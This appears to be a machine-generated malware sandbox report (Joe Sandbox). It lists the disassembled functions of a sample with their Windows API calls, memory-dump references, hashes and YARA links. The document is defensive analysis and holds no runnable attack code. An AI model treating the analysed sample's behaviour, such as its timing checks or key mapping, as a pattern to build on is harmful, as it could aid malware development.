                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3275902921-0
                                                                                                                                                                                                                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                                                                                                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                                                                                                                Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                                                                                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                                                                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                                                                                                                Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 004555C7
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3691411573-0
                                                                                                                                                                                                                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                                                                                                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                                                                                                                                Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 004472D6
                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 372113273-0
                                                                                                                                                                                                                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                                                                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                                                                                                                Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                                                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                                                                                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                                                                                                                Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __getptd.LIBCMT ref: 0041708E
                                                                                                                                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                                                                                                                • __lock.LIBCMT ref: 004170BE
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                                                                                                                • _free.LIBCMT ref: 004170EE
                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(02E72CB8), ref: 00417106
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3470314060-0
                                                                                                                                                                                                                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                                                                                                                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                                                                                                                Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                                                                                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                                                                                                                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                                                                                                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                                                                                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                                                                                                                Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Virtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4278518827-0
                                                                                                                                                                                                                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                                                                                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                                                                                                                Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 442100245-0
                                                                                                                                                                                                                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                                                                                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                                                                                                                Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 621800784-4108050209
                                                                                                                                                                                                                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                                                                                                                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                                                                                                                Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
